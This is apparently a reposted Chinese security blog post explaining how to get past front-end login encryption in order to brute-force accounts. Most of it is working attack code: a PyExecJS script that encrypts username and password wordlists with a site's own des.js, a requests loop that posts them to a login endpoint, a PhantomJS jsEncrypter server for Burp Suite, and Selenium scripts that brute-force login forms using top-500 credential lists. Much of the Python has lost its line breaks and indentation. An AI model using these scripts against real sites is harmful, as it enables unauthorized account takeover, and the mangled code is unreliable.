突破前端加密方法总结

0x00 执行加密的js文件生成加密内容

如 https://yyy.xxx.com/assets/des/des.js

对密码(123456)进行了前端加密传输。

这里还需要从页面源代码找到加密方法的参数

pip install PyExecJS

再安装PhantomJS(可选),或者用默认的js解析引擎也行。(execjs.get().name)

加密脚本:生成加密后的用户名和密码

#coding:utf-8#from selenium import webdriverimport execjsdef mzDes(s,para):
    despara = execjs.get('phantomjs').compile(s).call("strEnc",para,"csc","mz","2017")
    return desparawith open('des.js','r') as mzCrypto:

    s = mzCrypto.read()
    with open('users.txt','r') as users:   #des username
        with open('des_users.txt','w') as f4DesUser:
            user = users.readlines()
            for u in user:
                uname = u.strip()
                print uname
                desUsername = mzDes(s,uname)
                print desUsername
                f4DesUser.write(desUsername+'\n')



    with open('pwdTop54.txt','r') as pwds:   #des password
        with open('des_pwds.txt','w') as f4DesPwd:
            pwd = pwds.readlines()
            for p in pwd:
                passwd = p.strip()
                print passwd
                desPassword = mzDes(s,passwd)
                print desPassword
                f4DesPwd.write(desPassword+'\n')


这样就可以利用burpsuite/python脚本加载加密后的字典愉快的爆破啦。

py脚本爆破(单线程):

#coding:utf-8#from selenium import webdriverimport execjsimport requestsimport resuccessCount = 0def mzDes(s,para):
    despara = execjs.get().compile(s).call("strEnc",para,"csc","mz","2017")
    return desparawith open('des.js','r') as mzCrypto:

        s = mzCrypto.read()
        with open('users.txt','r') as users:   #des username


        user = users.readlines()
        for u in user:
            with open('top50.txt','r') as pwds:   #des password
                    uname = u.strip()
                    print uname
                    desUsername = mzDes(s,uname)
                    print desUsername

                    pwd = pwds.readlines()
                    for p in pwd:
                        passwd = p.strip()
                        print passwd
                        desPassword = mzDes(s,passwd)
                        print desPassword




                        burp0_url = "https://yyy.xxx.com:443/login"
                        burp0_cookies = {"acw_tc": "2", "session.id": "5e"}
                        burp0_headers = {"User-Agent": "Mozilla/5.0 Firefox", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://yyy.xxx.com", "Connection": "close", "Referer": "https://yyy.xxx.com/login", "Upgrade-Insecure-Requests": "1"}
                        burp0_data = {"usernumber": "test", "username": desUsername, "password": desPassword, "geetest_challenge": "caaf52fec"}

                        rsp = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

                        #print rsp.headers['content-length']
                        #if rsp.headers['content-length'] != 23862:
                        #   print 'success!!!'
                        print len(rsp.content)
                        if len(rsp.content) != 23862:
                        print 'success'
                        successCount = successCount + 1
                        pattern = re.compile(r'<p class="login-error">(.*?)</p>')

                        bruteResult = pattern.search(rsp.text)
                        print bruteResultprint successCount

如果遇到结合了动态因子(cookie或请求参数的某动态值)加密的,如key = substr(0,8,xsession),就要根据实际情况写爆破脚本了。

0x01 burpsuite插件jsencrypt

安装phantomjs

https://github.com/c0ny1/jsEncrypter

用法参考readme

编写对应的jsEncrypter_des.js

var webserver = require('webserver');server = webserver.create();var host = '127.0.0.1';var port = '1664';// 加载实现加密算法的js脚本var wasSuccessful = phantom.injectJs('des.js');/*引入实现加密的js文件*/// 处理函数function js_encrypt(payload){
    var newpayload;
    /**********在这里编写调用加密函数进行加密的代码************/
    //var b = new Base64();
    newpayload = strEnc(payload,"key","para0","para1");
    /**********************************************************/
    return newpayload;}if(wasSuccessful){
    console.log("[*] load js successful");
    console.log("[!] ^_^");
    console.log("[*] jsEncrypterJS start!");
    console.log("[+] address: http://"+host+":"+port);}else{
    console.log('[*] load js fail!');}var service = server.listen(host+':'+port,function(request, response){
    try{
        if(request.method == 'POST'){
            var payload = request.post['payload'];
            var encrypt_payload = js_encrypt(payload); 
            console.log('[+] ' + payload + ':' + encrypt_payload);
            response.statusCode = 200;
            response.write(encrypt_payload.toString());
            response.close();
        }else{
              response.statusCode = 200;
              response.write("^_^\n\rhello jsEncrypter!");
              response.close();
        }
    }catch(e){
        console.log('\n-----------------Error Info--------------------')
        var fullMessage = "Message: "+e.toString() + ':'+ e.line;
        for (var p in e) {
            fullMessage += "\n" + p.toUpperCase() + ": " + e[p];
        } 
        console.log(fullMessage);
        console.log('---------------------------------------------')
        console.log('[*] phantomJS exit!')
        phantom.exit();
    }   });

0x02 理解js加密算法

如md5/sha1,直接写py脚本即可,复杂一点的就要调试js了

burpsuite的intruder模块自带了很多加密的选项可以直接用

0x03 浏览器自动化爆破

安装selenium
安装浏览器驱动,加入环境变量。

#coding:utf-8import timeimport sysfrom selenium import webdriverreload(sys) sys.setdefaultencoding('utf-8')def BruteLogin(user,pwd):


        browser.get('http://xxx.cn/manage/login.aspx')
        browser.implicitly_wait(7)
        elem = browser.find_element_by_name("name")
        elem.send_keys(user)
        elem=browser.find_element_by_name("pws")
        elem.send_keys(pwd)

        elem=browser.find_element_by_id("submit")
        #print browser.current_window_handle
        elem.click()

        time.sleep(1)
        if '当前用户' in browser.page_source:

            print 'Login Success:' + user + '|' + pwd
            sys.exit()
        else:
            print 'LoginFaild!'browser = webdriver.Chrome()def main():

    with open('usernameTop500.txt','r') as fuser:
            for user in fuser.readlines():
                    u = user.strip()
                    with open('topwdglobal.txt','r') as fpwd:
                        for pwd in fpwd.readlines():
                                p = pwd.strip()
                                print 'testing...' + u,p
                                BruteLogin(u,p)

    browser.quit()if __name__ == '__main__':
    main()

如果有些元素不能直接定位,就尝试用autochain,如:

#coding:utf-8#Author:LSA#Descript:selenium for brute#Data:201812import timeimport sysfrom selenium import webdriverfrom selenium.webdriver.common import action_chains, keysimport timereload(sys) sys.setdefaultencoding('utf-8')def BruteLogin(user,pwd):


        browser.get('http://xxx.edu.cn/login.jsp')
        browser.implicitly_wait(20)

        action = action_chains.ActionChains(browser)

        elem = browser.find_element_by_name("j_username")
        elem.send_keys(user)

        action.perform()

        elem=browser.find_element_by_name("j_password")
        elem.send_keys(pwd)

        action.perform()

        elem=browser.find_element_by_name("btn_submit")
        #print browser.current_window_handle
        #elem.click()

        action.send_keys("document.getElementsByName('btn_submit')[0].click()"+keys.Keys.ENTER)
        action.perform()

        time.sleep(1)
        if '当前用户' in browser.page_source:

            print 'Login Success:' + user + '|' + pwd
            sys.exit()
        else:
            print 'LoginFaild!'browser = webdriver.Chrome()def main():

    with open('usernameTop500.txt','r') as fuser:
            for user in fuser.readlines():
                    u = user.strip()
                    with open('topwdglobal.txt','r') as fpwd:
                        for pwd in fpwd.readlines():
                            p = pwd.strip()
                            print 'testing...' + u,p
                            BruteLogin(u,p)

    browser.quit()if __name__ == '__main__':
    main()

0x04 misc

  1. 中间服务器:自己搭一个服务及作为中继进行加密再发给目标服务器,较麻烦。

  2. 断点调试js修改参数

  3. fiddler替换js

可视具体情况使用。

//预览看到代码缩进没了,全部py脚本打包到附件了

https://xzfile.aliyuncs.com/upload/affix/20200206161837-4690f6bc-48b9-1.zip

来自先知社区:https://xz.aliyun.com/t/7190

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值